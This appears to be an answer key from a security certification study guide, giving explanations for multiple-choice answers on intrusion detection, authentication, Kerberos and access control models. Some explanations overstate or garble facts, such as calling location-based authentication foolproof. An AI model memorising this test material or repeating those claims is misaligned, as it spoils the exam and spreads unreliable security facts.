A. Altering the configuration of an intrusion detection and prevention system (IDPS) to improve its detection accuracy is known as tuning. IDPS technologies cannot provide completely accurate detection at all times. Access to the targeted host is blocked from the offending user account or IP address. Evasion is modifying the format or timing of malicious activity so that its appearance changes but its effect is the same. Attackers use evasion techniques to try to prevent intrusion detection and prevention system (IDPS) technologies from detecting their attacks. Most IDPS technologies can overcome common evasion techniques by duplicating special processing performed by the targeted host. If the IDPS configuration is same as the targeted host, then evasion techniques will be unsuccessful at hiding attacks. Some intrusion prevention system (IPS) technologies can remove or replace malicious portions of an attack to make it benign. A complex example is an IPS that acts as a proxy and normalizes incoming requests, which means that the proxy repackages the payloads of the requests, discarding header information. This might cause certain attacks to be discarded as part of the normalization process.

Answer 498

A. Reusing a user’ operating system password for preboot authentication in a full (whole) disk encryption deployment would allow an attacker to learn only a single password to gain full access to the device’s information. The password could be acquired through technical methods, such as infecting the device with malware, or through physical means, such as watching a user type in a password in a public location. The correct choice is risky compared to the incorrect choices because the latter do not deal with booting a computer or pre boot authentication.

Answer 499

A. Products such as volume encryption, virtual disk encryption, or file/folder encryption may use the operating system’s authentication for single sign-on (SSO). After a user authenticates to the operating system at login time, the user can access the encrypted file without further authentication, which is risky. You should not use the same single-factor authenticator for multiple purposes. A full-disk encryption provides better security than the other three choices because the entire disk is encrypted, as opposed to part of it.

Answer 500

D. For high-security situations, storage encryption authentication products can be configured so that too many failed attempts cause the product to delete all the protected data from the device. This approach strongly favors security over functionality. The other three choices can be used for low-security situations.

Answer 501

C. Recovery mechanisms increase the availability of the storage encryption authentication solutions for individual users, but they can also increase the likelihood that an attacker can gain unauthorized access to encrypted storage by abusing the recovery mechanism. Therefore, information security management should consider the trade off between availability and security when selecting and planning recovery mechanisms. The other three choices do not provide recovery mechanisms.

Answer 502

A. When a user logs onto a host computer or workstation, the user must be identified and authenticated before access to the host or network is granted. This process requires a mechanism to authenticate a real person to a machine. The best methods of doing this involve multiple forms of authentication with multiple factors, such as something you know (password), something you have (physical token), and something you are (biometric verification). The other three choices do not require multifactor authentication because they use different authentication methods. Peer-to-peer architecture, sometimes referred to as mutual authentication protocol, involves the direct communication of authentication information between the communicating entities (e.g., peer-to-peer or client host-to-server). The architecture for trusted third-party (TTP) authentication uses a third entity, trusted by all entities, to provide authentication information. The amount of trust given the third entity must be evaluated. Methods to establish and maintain a level of trust in a TTP include certification practice statements (CPS) that establishes rules, processes, and procedures that a certificate authority (CA) uses to ensure the integrity of the authentication process and use of secure protocols to interface with authentication servers. A TTP may provide authentication information in each instance of authentication, in realtime, or as a precursor to an exchange with a CA.

Answer 503

D. One way to ensure password strength is to add a password filter utility program, which is specifically designed to verify that a password created by a user complies with the password policy. Adding a password filter is a more rigorous and proactive solution, whereas the other three choices are less rigorous and reactive solutions. The password filter utility program is also referred to as a password complexity enforcement program.

Answer 504

D. Robust authentication increases security in two significant ways. It can require the user to possess a token in addition to a password or personal identification number (PIN). Tokens, when used with PINs, provide significantly more security than passwords. For a hacker or other would-be impersonator to pretend to be someone else, the impersonator must have both a valid token and the corresponding PIN. This is much more difficult than obtaining a valid password and user ID combination. Robust authentication can also create one-time passwords. Electronic monitoring (eavesdropping or sniffing) or observing a user type in a password is not a threat with one-time passwords because each time a user is authenticated to the computer, a different “password” is used. (A hacker could learn the one-time password through electronic monitoring, but it would be of no value.) The firewall is incorrect because it uses a secure gateway or series of gateways to block or filter access between two networks, often between a private network and a larger, more public network such as the Internet or public-switched network (e.g., the telephone system). Firewall does not use tokens and passwords as much as robust authentication. A port protection device (PPD) is incorrect because it is fitted to a communications port of a host computer and authorizes access to the port itself, prior to and independent of the computer’s own access control functions. A PPD can be a separate device in the communications stream or may be incorporated into a communications device (e.g. a modem). PPDs typically require a separate authenticator, such as a password, to access the communications port. One of the most common PPDs is the dial-back modem. PPD does not use tokens and passwords as much as robust authentication. Encryption is incorrect because it is more expensive than robust authentication. It is most useful if highly confidential data needs to be transmitted or if moderately confidential data is transmitted in a highthreat area. Encryption is most widely used to protect the confidentiality of data and its integrity (it detects changes to files). Encryption does not use tokens and passwords as much as robust authentication.

Answer 505

A. Some applications use access control (typically enforced by the operating system) to restrict access to certain types of information or application functions. This can be helpful to determine what a particular application user could have done. Some applications record information related to access control, such as failed attempts to perform sensitive actions or access restricted data.

Answer 506

B. Auditing is a detection activity, not a preventive measure. Examples of preventive measures to mitigate the risks of network intrusion attacks include firewalls, system configuration, and intrusion detection system.

Answer 507

C. Smart cards are credit card-size plastic cards that host an embedded computer chip containing an operating system, programs, and data. Smart card authentication is perhaps the best-known example of proof-by-possession (e.g., key, card, or token). Passwords are an example of proof-by-knowledge. Fingerprints are an example of proof by-property. Proof-of-concept deals with testing a product prior to building an actual product.

Answer 508

A. In electronic authentication, a countermeasure against the token threat of online guessing uses tokens that generate high entropy authenticators. Common countermeasures against the threats listed in the other three choices are the same and they do not use high entropy authenticators. These common countermeasures include (i) use of tokens with dynamic authenticators where knowledge of one authenticator does not assist in deriving a subsequent authenticator and (ii) use of tokens that generate authenticators based on a token input value.

Answer 509

A. The underlying mechanism used to authenticate users via smart cards relies on a challenge-response protocol between the device and the smart card. For example, a personal digital assistant (PDA) challenges the smart card for an appropriate and correct response that can be used to verify that the card is the one originally enrolled by the PDA device owner. The challenge-response protocol provides a security service. The three main software components that support a smart card application include the service provider, a resource manager, and a driver for the smart card reader.

Answer 510

D. For user authentication, the fundamental threat is an attacker impersonating a user and gaining control of the device and its contents. Of all the four choices, impersonating is a non sophisticated technical attack. Smart cards are designed to resist tampering and monitoring of the card, including sophisticated technical attacks that involve reverse engineering, fault injection, and signal leakage.

Answer 511

B. Non polled authentication is discrete; after the verdict is determined, it is inviolate until the next authentication attempt. Examples of non polled authentication include password, fingerprint, and voice verification. Polled authentication is continuous; the presence or absence of some token or signal determines the authentication status. Examples of polled authentication include smart card, memory token, and communications signal, whereby the absence of the device or signal triggers a non authenticated condition.

Answer 512

B. Honeypot systems, padded cell systems, and vulnerability assessment tools complement IDS to enhance an organization’s ability to detect intrusion. Inference cells do not complement IDS. A honeypot system is a host computer that is designed to collect data on suspicious activity and has no authorized users other than security administrators and attackers. Inference cells lead to an inference attack when a user or intruder is able to deduce privileged information from known information. In padded cell systems, an attacker is seamlessly transferred to a special padded cell host. Vulnerability assessment tools determine when a network or host is vulnerable to known attacks

Answer 513

B. Sniffing is observing and monitoring packets passing by on the network traffic using packet sniffers. Sniffing precedes either spoofing or hijacking. Spoofing, in part, is using various techniques to subvert IP-based access control by masquerading as another system by using their IP address. Spoofing is an attempt to gain access to a system by posing as an authorized user. Other examples of spoofing include spoofing packets to hide the origin of attack in a DoS, spoofing e-mail headers to hide spam, and spoofing phone numbers to fool caller-ID. Spoofing is synonymous with impersonating, masquerading, or mimicking, and is not synonymous with sniffing. Hijacking is an attack that occurs during an authenticated session with a database or system. Snooping, scanning, and sniffing are all actions searching for required and valuable information. They involve looking around for vulnerabilities and planning to attack. These are preparatory actions prior to launching serious penetration attacks. Phishing is tricking individuals into disclosing sensitive personal information through deceptive computer-based means. Phishing attacks use social engineering and technical subterfuge to steal consumers’ personal identity data and financial account credentials. It involves Internet fraudsters who send spam or pop-up messages to lure personal information (e.g., credit card numbers, bank account information, social security number, passwords, or other sensitive information) from unsuspecting victims. Pharming is misdirecting users to fraudulent websites or proxy servers, typically through DNS hijacking or poisoning. Cracking is breaking for passwords and bypassing software controls in an electronic authentication system such as user registration. Scamming is impersonating a legitimate business using the Internet. The buyer should check out the seller before buying goods or services. The seller should give out a physical address with a working telephone number.

Answer 514

C. Logical, physical, and administrative controls are examples of access control mechanisms. Passwords, PINs, and encryption are examples of logical access controls.

Answer 515

B. Honeypots are deceptive measures collecting better data on precursors, not on indications. A precursor is a sign that an incident may occur in the future. An indication is a sign that an incident may have occurred or may be occurring now. Honeypots are hosts that have no authorized users other than the honeypot administrators because they serve no business function; all activity directed at them is considered suspicious. Attackers scan and attack honeypots, giving administrators data on new trends and attack/attacker tools, particularly malicious code. However, honeypots are a supplement to, not a replacement for, properly securing networks, systems, and applications.

Answer 516

A. The principle of least privilege requires that each subject (user) in a system be granted the most restrictive set of privileges (or lowest clearances) needed to perform authorized tasks. The application of this principle limits the damage that can result from accident, error, and/or unauthorized use. The principle of separation of duties states that no single person can have complete control over a business transaction or task. The principle of system clearance states that users’ access rights should be based on their job clearance status (i.e., sensitive or non sensitive). The principle of system accreditation states that all systems should be approved by management prior to making them operational.

Answer 517

D. IDPS technologies use many methodologies to detect incidents. The primary classes of detection methodologies include signature based, anomaly-based, and stateful protocol analysis, where the latter is the only one that analyzes both network-based and host-based activity. Signature-based detection is the process of comparing signatures against observed events to identify possible incidents. A signature is a pattern that corresponds to a known threat. It is sometimes incorrectly referred to as misuse detection or stateful protocol analysis. Misuse detection refers to attacks from within the organizations. Anomaly-based detection is the process of comparing definitions of what activity is considered normal against observed events to identify significant deviations and abnormal behavior. Stateful protocol analysis (also known as deep packet inspection) is the process of comparing predetermined profiles of generally accepted definitions of benign protocol activity for each protocol state against observed events to identify deviations. The stateful protocol is appropriate for analyzing both network-based and host-based activity, whereas deep packet inspection is appropriate for network-based activity only. One network-based IDPS can listen on a network segment or switch and can monitor the network traffic affecting multiple hosts that are connected to the network segment. One host based IDPS operates on information collected from within an individual computer system and determines which processes and user accounts are involved in a particular attack.

Answer 518

B. The Clark-Wilson security model is an approach that provides data integrity for common commercial activities. It is a specific model addressing “integrity,” which is one of five security objectives. The five objectives are: confidentiality, integrity, availability, accountability, and assurance.

Answer 519

B. The Biba security model is an integrity model in which no subject may depend on a less trusted object, including another subject. It is a specific model addressing only one of the security objectives such as confidentiality, integrity, availability, and accountability.

Answer 520

D. The Take-Grant security model uses a directed graph to specify the rights that a subject can transfer to an object or that a subject can take from another subject. It does not address the security objectives such as confidentiality, integrity, availability, and accountability. Access rights are a part of access control models.

Answer 521

C. Rainbow attacks are a form of a password cracking technique that employs rainbow tables, which are lookup tables that contain pre computed password hashes. These tables enable an attacker to attempt to crack a password with minimal time on the victim system and without constantly having to regenerate hashes if the attacker attempts to crack multiple accounts. The other three choices are not based on pre-computed password hashes; although, they are all related to passwords. A brute force attack is a form of a guessing attack in which the attacker uses all possible combinations of characters from a given character set and for passwords up to a given length. A dictionary attack is a form of a guessing attack in which the attacker attempts to guess a password using a list of possible passwords that is not exhaustive. A hybrid attack is a form of a guessing attack in which the attacker uses a dictionary that contains possible passwords and then uses variations through brute force methods of the original passwords in the dictionary to create new potential passwords.

Answer 522

C. Anomaly-based detection is the process of comparing definitions of what activity is considered normal against observed events to identify significant deviations. Thresholds are most often used for anomaly-based detection. A threshold is a value that sets the limit between normal and abnormal behavior. An anomaly-based detection does not use blacklists, whitelists, and program code viewing. A blacklist is a list of discrete entities, such as hosts or applications that have been previously determined to be associated with malicious activity. A whitelist is a list of discrete entities, such as hosts or applications known to be benign. Program code viewing and editing features are established to see the detection related programming code in the intrusion detection and prevention system (IDPS).

Answer 523

C. The Clark and Wilson security model addresses the separation of duties concept along with well-formed transactions. Separation of duties attempts to ensure the external consistency of data objects. It also addresses the specific integrity goal of preventing authorized users from making improper modifications. The other three models do not address the separation of duties concept

Answer 524

C. As presented by Brewer and Nash, the Chinese-Wall policy is a mandatory access control policy for stock market analysts. According to the policy, a market analyst may do business with any company. However, every time the analyst receives sensitive “inside“ information from a new company, the policy prevents him from doing business with any other company in the same industry because that would involve him in a conflict of interest situation. In other words, collaboration with one company places the Chinese-Wall between him and all other companies in the same industry. The Chinese-Wall policy does not meet the definition of an aggregation problem; there is no notion of some information being sensitive with the aggregate being more sensitive. The Chinese-Wall policy is an access control policy in which the access control rule is not based just on the sensitivity of the information, but is based on the information already accessed. It is neither an inference nor a data classification problem.

Answer 525

C. In a Bell-LaPadula model, the clearance/classification scheme is expressed in terms of a lattice. To determine whether a specific access model is allowed, the clearance of a subject is compared to the classification of the object, and a determination is made as to whether the subject is authorized for the specific access mode. The other three models do not deal with security clearances and sensitivity classifications.

Answer 526

B. A local password could be based on a cryptographic hash of the media access control address and a standard password. However, if an attacker recovers one local password, the attacker could easily determine other local passwords. An attacker could not exploit the other three choices because they are secure. Other positive solutions include disabling built-in accounts, storing the passwords in the database in an encrypted form, and generating passwords based on a machine name or a media access control address.

Answer 527

C. An IDS should be used as a complement to a firewall, not a substitute for it. Together, they provide a synergistic effect.

Answer 528

C. Star property (* -property) is a Bell-LaPadula security rule enabling a subject write access to an object only if the security level of the object dominates the security level of the subject.

Answer 529

C. The key thing in shoulder surfing is to make sure that no one watches the user while his password is typed. Encryption does not help here because it is applied after a password is entered, not before. Proper education and awareness and using difficult-to-guess passwords can eliminate this problem.

Answer 530

B. The star property means no write-down and yes to a write-up. A subject can write objects only at a security level that dominates the subject’s level. This means, a subject of one higher label cannot write to any object of a lower security label. This is also known as the confinement property. A subject is prevented from copying data from one higher classification to a lower classification. In other words, a subject cannot write anything below that subject’s level.

Answer 531

B. The Biba model is an example of an integrity model. The Bell LaPadula model is a formal state transition model of a computer security policy that describes a set of access control rules. Both the Bell-LaPadula and the Take-Grant models are a part of access control models.

Answer 532

A. The Bell-LaPadula model addresses confidentiality by describing different security levels of security classifications for documents. These classification levels, from least sensitive to most insensitive, include Unclassified, Confidential, Secret, and Top Secret.

Answer 533

C. “What the user can do” is defined in access rules or user profiles, which come after a successful authentication. The other three choices are part of an authentication process. The authenticator factor “knows” means a password or PIN, “has” means key or card, and “is” means a biometric identity.

Answer 534

B. The Bell-LaPadula model is used for protecting the confidentiality of classified information, based on multilevel security classifications. The information flow model, a basis for the Bell LaPadula model, ensures that information at a given security level flows only to an equal or higher level. Each object has an associated security level. An object’s level indicates the security level of the data it contains. These two models ensure the confidentiality of classified information. The Biba model is similar to the Bell-LaPadula model but protects the integrity of information instead of its confidentiality. The Clark-Wilson model is a less formal model aimed at ensuring the integrity of information, not confidentiality. This model implements traditional accounting controls including segregation of duties, auditing, and well formed transactions such as double entry bookkeeping. Both the Biba and Clark-Wilson models are examples of integrity models.

Answer 535

C. It is essential to detect insecure situations to respond in a timely manner. Also, it is of little use to detect a security breach if no effective response can be initiated. No set of prevention measures is perfect. Reporting is the last step in the intrusion detection and containment process.

Answer 536

B. The processing engine is the heart of the intrusion detection system (IDS). It consists of the instructions (language) for sorting information for relevance, identifying key intrusion evidence, mining databases for attack signatures, and decision making about thresholds for alerts and initiation of response activities. For example, a mutation engine is used to obfuscate a virus, polymorphic or not, to aid the proliferation of the said virus. A state machine is the basis for all computer systems because it is a model of computations involving inputs, outputs, states, and state transition functions. A virtual machine is software that enables a single host computer to run using one or more guest operating systems.

Answer 537

D. When failures occur due to flaws in exclusion-based systems, they tend to grant unauthorized permissions. The two types of access control decisions are permission-based and exclusion-based.

Answer 538

B. One of the biggest single issues with intrusion detection system (IDS) implementation is the handling of false-positive notification. An anomaly-based IDS produces a large number of false alarms (false positives) due to the unpredictable nature of users and networks. Automated systems are prone to mistakes, and human differentiation of possible attacks is resource-intensive.

Answer 539

C. For basic authentication, user IDs, passwords, and account numbers are used for internal authentication. Centralized authentication servers such as RADIUS and TACACS/TACACS+ can be integrated with token-based authentication to enhance firewall administration security.

Answer 540

A. Authorization comes after authentication because a user is granted access to a program (authorization) after he is fully authenticated. Authorization is permission to do something with information in a computer. Authorization and authentication are not the same, where the former is verifying the user’s permission and the latter is verifying the identity of a user.

Answer 541

B. The simplest form of initial authentication uses a user ID and password, which occurs on the client. The server has no knowledge of whether the authentication was successful. The problem with this approach is that anyone can make a request to the server asserting any identity, allowing an attacker to collect replies from the server and successfully launching a real attack on those replies. In pre-authentication, the user sends some proof of his identity to the server as part of the initial authentication process. The client must authenticate prior to the server issuing a credential (ticket) to the client. The proof of identity used in pre-authentication can be a smart card or token, which can be integrated into the Kerberos initial authentication process. Here, post-authentication and re-authentication processes do not apply because it is too late to be of any use.

Answer 542

D. Discretionary access control (DAC) permits the granting and revoking of access control privileges to be left to the discretion of individual users. A discretionary access control mechanism enables users to grant or revoke access to any of the objects under the control. As such, users are said to be the owners of the objects under their control. It uses access control lists.

Answer 543

C. Robust authentication means strong authentication that should be required for accessing internal computer systems. Robust authentication is provided by Kerberos, one-time passwords, challenge-response exchanges, digital certificates, and secure remote procedure calls (Secure RPC). Reusable passwords provide weak authentication.

Answer 544

A. Kerberos uses symmetric key cryptography and a trusted third party. Kerberos users authenticate with one another using Kerberos credentials issued by a trusted third party. The bit size of Kerberos is the same as that of DES, which is 56 bits because Kerberos uses a symmetric key algorithm similar to DES.

Answer 545

D. Continuous authentication protects against impostors (active attacks) by applying a digital signature algorithm to every bit of data sent from the claimant to the verifier. Also, continuous authentication prevents session hijacking and provides integrity. Static authentication uses reusable passwords, which can be compromised by replay attacks. Robust authentication includes one time passwords and digital signatures, which can be compromised by session hijacking. Intermittent authentication is not useful because of gaps in user verification.

Answer 546

D. Intrusion detection and prevention system (IDPS) technologies cannot provide completely accurate detection at all times. All four items are true statements. When an IDPS incorrectly identifies benign activity as being malicious, a false positive has occurred. When an IDPS fails to identify malicious activity, a false negative has occurred.

Answer 547

D. Passwords and PINs are often vulnerable to guessing, interception, or brute force attack. Devices such as access tokens and crypto-cards can be stolen. Biometrics can be vulnerable to interception and replay attacks. A location cannot be different than what it is. The techniques used in the other three choices are not foolproof. However, “where the user is” based on a geodetic location is foolproof because it cannot be spoofed or hijacked. Geodetic location, as calculated from a location signature, adds a fourth and new dimension to user authentication and access control mechanisms. The signature is derived from the user’s location. It can be used to determine whether a user is attempting to log in from an approved location. If unauthorized activity is detected from an authorized location, it can facilitate finding the user responsible for that activity.

Answer 548

C. A rule-based access control mechanism is based on specific rules relating to the nature of the subject and object. These specific rules are embedded in access rules. Filtering rules are specified in firewalls. Both identity and business rules are inapplicable here.

Answer 549

C. The proof-of-wholeness control is a system integrity tool that analyzes system integrity and irregularities and identifies exposures and potential threats. The proof-of-wholeness principle detects violations of security policies. Auditing is a detective control, which enables monitoring and tracking of system abnormalities. “Restore to secure state” is a recovery control that enables a system to return to a state that is known to be secure, after a security breach occurs. Intrusion detection tools detect security breaches.

Answer 550

D. A basic tenet of IT security is that individuals must be accountable for their actions. If this is not followed and enforced, it is not possible to successfully prosecute those who intentionally damage or disrupt systems or to train those whose actions have unintended adverse effects. The concept of individual accountability drives the need for many security safeguards, such as unique (user) identifiers, audit trails, and access authorization rules. Policies and procedures indicate what to accomplish and how to accomplish objectives. By themselves, they do not exact individual accountability.

Answer 551

D. A virtual password is a password computed from a passphrase that meets the requirements of password storage (e.g., 56 bits for DES). A passphrase is a sequence of characters, longer than the acceptable length of a regular password, which is transformed by a password system into a virtual password of acceptable length. An access password is a password used to authorize access to data and is distributed to all those who are authorized to have similar access to that data. A personal password is a password known by only one person and is used to authenticate that person’s identity. A valid password is a personal password that authenticates the identity of an individual when presented to a password system. It is also an access password that enables the requested access when presented to a password system.

Answer 552

C. The database administrator (DBA) function is concerned with short-term development and use of databases, and is responsible for the data of one or several specific databases. The DBA function should be separate from the systems’ security function due to possible conflict of interest for manipulation of access privileges and rules for personal gain. The DBA function can be mixed with data administration, information systems administration, or information systems planning because there is no harm to the organization

Answer 553

B. A replay attack refers to the recording and retransmission of message packets in the network. Although a replay attack is frequently undetected, but it can be prevented by using packet timestamping. Kerberos uses the timestamps but not cards, tokens, and keys.

Answer 554

D. Biometric systems require the creation and storage of profiles or templates of individuals wanting system access. This includes physiological attributes such as fingerprints, hand geometry, or retina patterns, or behavioral attributes such as voice patterns and handwritten signatures. Memory tokens and smart cards involve the creation and distribution of a token device with a PIN, and data that tell the computer how to recognize valid tokens or PINs. Cryptography requires the generation, distribution, storage, entry, use, distribution, and archiving of cryptographic keys.

Answer 555

C. System administrators should ensure that all intrusion detection and prevention system (IDPS) management communications are protected either through physical separation (management network) or logical separation (virtual network) or through encryption using transport layer security (TLS). However, for security products that do not provide sufficient protection through encryption, administrators should consider using a virtual private network (VPN) or other encrypted tunneling method to protect the network traffic.

Answer 556

A. Kerberos is a private key authentication system that uses a central database to keep a copy of all users’ private keys. The entire system can be compromised due to the central database. Kerberos is used to manage centralized access rights, encryption keys, and access permissions.

Answer 557

B. Mandatory access controls are the simplest to use because they can be used to grant broad access to large sets of files and to broad categories of information. Discretionary access controls are not simple to use due to their finer level of granularity in the access control process. Both the access control list and logical access control require a significant amount of administrative work because they are based on the details of each individual user

Answer 558

A. With role-based access control, access decisions are based on the roles that individual users have as part of an organization. Users take on assigned roles (such as doctor, nurse, bank teller, and manager). Access rights are grouped by role name, and the use of resources is restricted to individuals authorized to assume the associated role. The use of roles to control access can be an effective means for developing and enforcing enterprise-specific security policies and for streamlining the security management process. Identity-based and user-directed policies are incorrect because they are examples of discretionary access control. Identity-based access control is based only on the identity of the subject and object. In user-directed access controls, a subject can alter the access rights with certain restrictions. Rule-based policy is incorrect because it is an example of a mandatory type of access control and is based on specific rules relating to the nature of the subject and object.

Answer 559

B. IP address-based access mechanisms use Internet Protocol (IP) source addresses, which are not secure and subject to IP address spoofing attacks. The IP address deals with identification only, not authentication. Location-based access mechanism is incorrect because it deals with a physical address, not IP address. Token-based access mechanism is incorrect because it uses tokens as a means of identification and authentication. Web-based access mechanism is incorrect because it uses secure protocols to accomplish authentication. The other three choices accomplish both identification and authentication and do not create a security problem as does the IP address-based access mechanism.

Answer 560

C. A challenge-response protocol is based on cryptography and works by having the computer generate a challenge, such as a random string of numbers. The smart token then generates a response based on the challenge. This is sent back to the computer, which authenticates the user based on the response. Smart tokens that use either challenge response protocols or dynamic password generation can create one time passwords that change periodically (e.g., every minute). If the correct value is provided, the log-in is permitted, and the user is granted access to the computer system. Electronic monitoring is not a problem with one-time passwords because each time the user is authenticated to the computer, a different “password” is used. A hacker could learn the one-time password through electronic monitoring, but it would be of no value. Passwords and personal identification numbers (PINs) have weaknesses such as disclosing and guessing. Passwords combined with PINs are better than passwords only. Both passwords and PINs are subject to electronic monitoring. Simple encryption of a password that will be used again does not solve the monitoring problem because encrypting the same password creates the same cipher-text; the cipher text becomes the password.

Answer 561

A. Recurring passwords are static passwords with reuse and are considered to be a relatively weak security mechanism. Users tend to use easily guessed passwords. Other weaknesses include spoofing users, users stealing passwords through observing keystrokes, and users sharing passwords. The unauthorized use of passwords by outsiders (hackers) or insiders is a primary concern and is considered the least efficient and least effective security mechanism for re authentication. Nonrecurring passwords are incorrect because they provide a strong form of re-authentication. Examples include a challenge-response protocol or a dynamic password generator where a unique value is generated for each session. These values are not repeated and are good for that session only. Tokens can help in re-authenticating a user or transaction. Memory tokens store but do not process information. Smart tokens expand the functionality of a memory token by incorporating one or more integrated circuits into the token itself. In other words, smart tokens store and process information. Except for passwords, all the other methods listed in the question are examples of advanced authentication methods that can be applied to re-authentication.

Answer 562

C. Separation of duties is the first line of defense against the prevention, detection, and correction of errors, omissions, and irregularities. The objective is to ensure that no one person has complete control over a transaction throughout its initiation, authorization, recording, processing, and reporting. If the total risk is acceptable, then two different jobs can be combined. If the risk is unacceptable, the two jobs should not be combined. Both quality assurance and data security are staff functions and would not handle the day-to-day operations tasks. The other three choices are incorrect because they are examples of incompatible functions. The rationale is to minimize such functions that are not conducive to good internal control structure. For example, if a computer operator is also responsible for production job scheduling, he could submit unauthorized production jobs.

Answer 563

D. Mandatory access control is a type of access control that cannot be made more permissive by subjects. They are based on information sensitivity such as security labels for clearance and data classification. Rule-based and administratively directed policies are examples of mandatory access control policy. Role-based policy is an example of nondiscretionary access controls. Access control decisions are based on the roles individual users are taking in an organization. This includes the specification of duties, responsibilities, obligations, and qualifications (e.g., a teller or loan officer associated with a banking system). Both identity-based and user-directed policies are examples of discretionary access control. It is a type of access control that permits subjects to specify the access controls with certain limitations. Identity-based access control is based only on the identity of the subject and object. User-directed control is a type of access control in which subjects can alter the access rights with certain restrictions.

Answer 564

A. Authorization creep occurs when employees continue to maintain access rights for previously held positions within an organization. This practice is inconsistent with the principle of least privilege. All the other three choices are incorrect because they are consistent with the principle of least privilege. Reauthorization can eliminate authorization creep, and it does not matter how many users have access to the system or how much access to the system as long as their access is based on need-to-know concept. Permanent changes are necessary when employees change positions within an organization. In this case, the process of granting account authorizations occurs again. At this time, however, it is also important that access authorizations of the prior position be removed. Many instances of authorization-creep have occurred with employees continuing to maintain access rights for previously held positions within an organization. This practice is inconsistent with the principle of least privilege, and it is security vulnerability.

Answer 565

B. Accountability means holding individual users responsible for their actions. Due to several problems with passwords and user IDs, they are considered to be the least effective in exacting accountability. These problems include easy to guess passwords, easy to spoof users for passwords, easy to steal passwords, and easy to share passwords. The most effective controls for exacting accountability include a policy, authorization scheme, identification and authentication controls, access controls, audit trails, and auditing.

Answer 566

A. The relationship between the registration authority (RA) and the credential service provider (CSP) is a complex one with ongoing relationship. In the simplest and perhaps the most common case, the RA and CSP are separate functions of the same entity. However, an RA might be part of a company or organization that registers subscribers with an independent CSP, or several different CSPs. Therefore a CSP may be an integral part of RA, or it may have relationships with multiple independent RAs, and an RA may have relationships with different CSPs as well. The statements in the other three choices are true. The party to be authenticated is called a claimant (subscriber) and the party verifying that identity is called a verifier. When a subscriber needs to authenticate to perform a transaction, he becomes a claimant to a verifier. A relying party relies on results of an online authentication to establish the identity or attribute of a subscriber for the purpose of some transaction. Relying parties use a subscriber’s authenticated identity and other factors to make access control or authorization decisions. The verifier and the relying party may be the same entity, or they may be separate entities. In some cases the verifier does not need to directly communicate with the CSP to complete the authentication activity (e.g., the use of digital certificates), which represents a logical link between the two entities rather than a physical link. In some implementations, the verifier, the CSP functions, and the relying party may be distributed and separated.

Answer 567

C. Transportation firms can use location-based authentication techniques continuously, as there are no time and resource limits. It does not require any secret information to protect at either the host or user end. Continuous authentication is better than robust authentication, where the latter can be intermittent.

Answer 568

C. Authentication data needs to be stored securely, and its value lies in the data’s confidentiality, integrity, and availability. If confidentiality is compromised, someone may use the information to masquerade as a legitimate user. If system administrators can read the authentication file, they can masquerade as another user. Many systems use encryption to hide the authentication data from the system administrators. Masquerading by system administrators cannot be entirely prevented. If integrity is compromised, authentication data can be added, or the system can be disrupted. If availability is compromised, the system cannot authenticate users, and the users may not be able to work. Because audit controls would be out of the control of the administrator, controls can be set up so that improper actions by the system administrators can be detected in audit records. Due to their broader responsibilities, the system administrators’ access to the system cannot be limited. System administrators can compromise a system’s integrity; again their actions can be detected in audit records. It makes a big difference whether an organization has one or more than one system administrator for separation of duties or for “least privilege” principle to work. With several system administrators, a system administrator account could be set up for one person to have the capability to add accounts. Another administrator could have the authority to delete them. When there is only one system administrator employed, breaking up the duties is not possible.

Answer 569

C. Computer-based access controls are called logical access controls. These controls can prescribe not only who or what is to have access to a specific system resource but also the type of access permitted, usually in software. Reliability is more of a hardware issue. Logical access controls can help protect (i) operating systems and other systems software from unauthorized modification or manipulation (and thereby help ensure the system’s integrity and availability); (ii) the integrity and availability of information by restricting the number of users and processes with access; and (iii) confidential information from being disclosed to unauthorized individuals.

Answer 570

A. Security labels are a strong form of access control. Unlike access control lists, labels cannot ordinarily be changed. Because labels are permanently linked to specific information, data cannot be disclosed by a user copying information and changing the access to that file so that the information is more accessible than the original owner intended. Security labels are well suited for consistently and uniformly enforcing access restrictions, although their administration and inflexibility can be a significant deterrent to their use. Passwords are a weak form of access control, although they are easy to use and administer. Although encryption is a strong form of access control, it is not a deterrent to its use when compared to labels. In reality, the complexity and difficulty of encryption can be a deterrent to its use.

Answer 571

B. At a minimum, four basic types of access controls should be considered: physical, operating system, communications, and application. In general, access controls within an application are the most specific. However, for application access controls to be fully effective, they need to be supported by operating system and communications system access controls. Otherwise, access can be made to application resources without going through the application. Operating system, communication, and application access controls need to be supported by physical access controls such as physical security and contingency planning.

Answer 572

A. Most systems can be compromised if someone can physically access the CPU machine or major components by, for example, restarting the system with different software. Logical access controls are, therefore, dependent on physical access controls (with the exception of encryption, which can depend solely on the strength of the algorithm and the secrecy of the key). Application systems, operating systems, and utility programs are heavily dependent on logical access controls to protect against unauthorized use.

Answer 573

D. By advising users that they are personally accountable for their actions, which are tracked by an audit trail that logs user activities, managers can help promote proper user behavior. Users are less likely to attempt to circumvent security policy if they know that their actions will be recorded in an audit log. Audit trails work in concert with logical access controls, which restrict use of system resources. Because logical access controls are enforced through software, audit trails are used to maintain an individual’s accountability. The other three choices collect some data in the form of an audit trail, and their use is limited due to the limitation of useful data collected.

Answer 574

D. Placing the Kerberos protocol below the application layer and at all layers of the network provides greatest security protection without the need to modify applications.

Answer 575

B. Properly authorized access, as well as misused authorized access, can use audit trail analysis but more so of the latter due to its high risk. Although users cannot be prevented from using resources to which they have legitimate access authorization, audit trail analysis is used to examine their actions. Similarly, unauthorized access attempts, whether successful or not, can be detected through the analysis of audit trails.

Answer 576

D. Many computer systems provide maintenance accounts. These special login accounts are normally preconfigured at the factory with preset, widely known weak passwords. It is critical to change these passwords or otherwise disable the accounts until they are needed. If the account is to be used remotely, authentication of the maintenance provider can be performed using callback confirmation. This helps ensure that remote diagnostic activities actually originate from an established phone number at the vendor’s site. Other techniques can also help, including encryption and decryption of diagnostic communications, strong identification and authentication techniques, such as smart tokens, and remote disconnect verification.

Answer 577

